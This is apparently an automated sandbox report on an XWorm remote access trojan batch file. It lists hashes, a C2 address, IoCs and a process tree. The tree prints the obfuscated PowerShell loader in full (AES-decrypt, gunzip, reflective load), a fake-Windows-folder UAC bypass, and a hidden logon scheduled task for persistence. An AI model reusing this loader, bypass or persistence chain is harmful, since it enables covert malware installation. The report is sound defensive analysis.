xworm | 5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde

General

Target

RoWare.bat
Size

399KB
MD5

472de93de365167459958b7ce29f610e
SHA1

7a7ace619fbd8569c2982fb1fc44aa4b6040f351
SHA256

5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
SHA512

03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a
SSDEEP

6144:VvP2P1+j6+5esGiWZo9wvkjXD6P8NUd7XPDRwEMiF7i5qwJgK5EG/R7H4z:ZOtyEvi7dzNmdjl5F7g1ZK8VH2

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

C2

91.92.250.4:2709

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/732-96-0x00000204BF730000-0x00000204BF744000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

21 732 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

3984 powershell.exe
732 powershell.exe
3656 powershell.exe
1184 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

ComputerDefaults.exe

pid process

4544 ComputerDefaults.exe
Loads dropped DLL 1 IoCs

Processes:

ComputerDefaults.exe

pid process

4544 ComputerDefaults.exe

flow	pid	process
21	732	powershell.exe

pid	process
4544	ComputerDefaults.exe

pid	process
4544	ComputerDefaults.exe

Drops file in System32 directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-08-22-02-44.etl	svchost.exe
File opened for modification	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-08-22-02-44.etl	svchost.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E1E99464E"	svchost.exe

Modifies registry class 13 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133623577550419911"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133623577648427669"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133623577632834548"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3984	powershell.exe
3984	powershell.exe
732	powershell.exe
732	powershell.exe
3656	powershell.exe
3656	powershell.exe
4032	powershell.exe
4032	powershell.exe
4032	powershell.exe
1184	powershell.exe
1184	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
3196	powershell.exe
3196	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3424 Explorer.EXE

pid	process
3424	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeIncreaseQuotaPrivilege	4032	powershell.exe
Token: SeSecurityPrivilege	4032	powershell.exe
Token: SeTakeOwnershipPrivilege	4032	powershell.exe
Token: SeLoadDriverPrivilege	4032	powershell.exe
Token: SeSystemProfilePrivilege	4032	powershell.exe
Token: SeSystemtimePrivilege	4032	powershell.exe
Token: SeProfSingleProcessPrivilege	4032	powershell.exe
Token: SeIncBasePriorityPrivilege	4032	powershell.exe
Token: SeCreatePagefilePrivilege	4032	powershell.exe
Token: SeBackupPrivilege	4032	powershell.exe
Token: SeRestorePrivilege	4032	powershell.exe
Token: SeShutdownPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeSystemEnvironmentPrivilege	4032	powershell.exe
Token: SeRemoteShutdownPrivilege	4032	powershell.exe
Token: SeUndockPrivilege	4032	powershell.exe
Token: SeManageVolumePrivilege	4032	powershell.exe
Token: 33	4032	powershell.exe
Token: 34	4032	powershell.exe
Token: 35	4032	powershell.exe
Token: 36	4032	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeIncreaseQuotaPrivilege	1184	powershell.exe
Token: SeSecurityPrivilege	1184	powershell.exe
Token: SeTakeOwnershipPrivilege	1184	powershell.exe
Token: SeLoadDriverPrivilege	1184	powershell.exe
Token: SeSystemProfilePrivilege	1184	powershell.exe
Token: SeSystemtimePrivilege	1184	powershell.exe
Token: SeProfSingleProcessPrivilege	1184	powershell.exe
Token: SeIncBasePriorityPrivilege	1184	powershell.exe
Token: SeCreatePagefilePrivilege	1184	powershell.exe
Token: SeBackupPrivilege	1184	powershell.exe
Token: SeRestorePrivilege	1184	powershell.exe
Token: SeShutdownPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeSystemEnvironmentPrivilege	1184	powershell.exe
Token: SeRemoteShutdownPrivilege	1184	powershell.exe
Token: SeUndockPrivilege	1184	powershell.exe
Token: SeManageVolumePrivilege	1184	powershell.exe
Token: 33	1184	powershell.exe
Token: 34	1184	powershell.exe
Token: 35	1184	powershell.exe
Token: 36	1184	powershell.exe
Token: SeIncreaseQuotaPrivilege	1184	powershell.exe
Token: SeSecurityPrivilege	1184	powershell.exe
Token: SeTakeOwnershipPrivilege	1184	powershell.exe
Token: SeLoadDriverPrivilege	1184	powershell.exe
Token: SeSystemProfilePrivilege	1184	powershell.exe
Token: SeSystemtimePrivilege	1184	powershell.exe
Token: SeProfSingleProcessPrivilege	1184	powershell.exe
Token: SeIncBasePriorityPrivilege	1184	powershell.exe
Token: SeCreatePagefilePrivilege	1184	powershell.exe
Token: SeBackupPrivilege	1184	powershell.exe
Token: SeRestorePrivilege	1184	powershell.exe
Token: SeShutdownPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeSystemEnvironmentPrivilege	1184	powershell.exe
Token: SeRemoteShutdownPrivilege	1184	powershell.exe
Token: SeUndockPrivilege	1184	powershell.exe
Token: SeManageVolumePrivilege	1184	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exe

description	pid	process	target process
PID 1676 wrote to memory of 2152	1676	cmd.exe	cmd.exe
PID 1676 wrote to memory of 2152	1676	cmd.exe	cmd.exe
PID 1676 wrote to memory of 884	1676	cmd.exe	cmd.exe
PID 1676 wrote to memory of 884	1676	cmd.exe	cmd.exe
PID 1676 wrote to memory of 3984	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 3984	1676	cmd.exe	powershell.exe
PID 3984 wrote to memory of 5032	3984	powershell.exe	cmd.exe
PID 3984 wrote to memory of 5032	3984	powershell.exe	cmd.exe
PID 5032 wrote to memory of 4544	5032	cmd.exe	ComputerDefaults.exe
PID 5032 wrote to memory of 4544	5032	cmd.exe	ComputerDefaults.exe
PID 4544 wrote to memory of 2332	4544	ComputerDefaults.exe	cmd.exe
PID 4544 wrote to memory of 2332	4544	ComputerDefaults.exe	cmd.exe
PID 2332 wrote to memory of 3356	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 3356	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 2220	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 2220	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 732	2332	cmd.exe	powershell.exe
PID 2332 wrote to memory of 732	2332	cmd.exe	powershell.exe
PID 732 wrote to memory of 3656	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3656	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 4032	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 4032	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 1184	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 1184	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3424	732	powershell.exe	Explorer.EXE
PID 732 wrote to memory of 784	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 3344	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1964	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 4872	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1160	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1744	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2652	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1148	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 948	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 944	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1140	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1332	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1132	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 736	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 4896	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1716	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2492	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1900	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1308	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 4652	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1892	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 904	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1192	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1880	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2076	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2268	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2068	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1276	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2256	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2244	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1048	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1640	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2624	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1832	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1432	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2612	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1576	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 2404	732	powershell.exe	svchost.exe
PID 732 wrote to memory of 1416	732	powershell.exe	svchost.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Drops file in System32 directory
- Modifies registry class
PID:784

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
2⤵
PID:3628

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
2⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3344

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RoWare.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:5032

C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4544

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
6⤵
- Suspicious use of WriteProcessMemory
PID:2332

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
7⤵
PID:3356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
7⤵
PID:2220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
4⤵
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\RoWare')
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2224

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

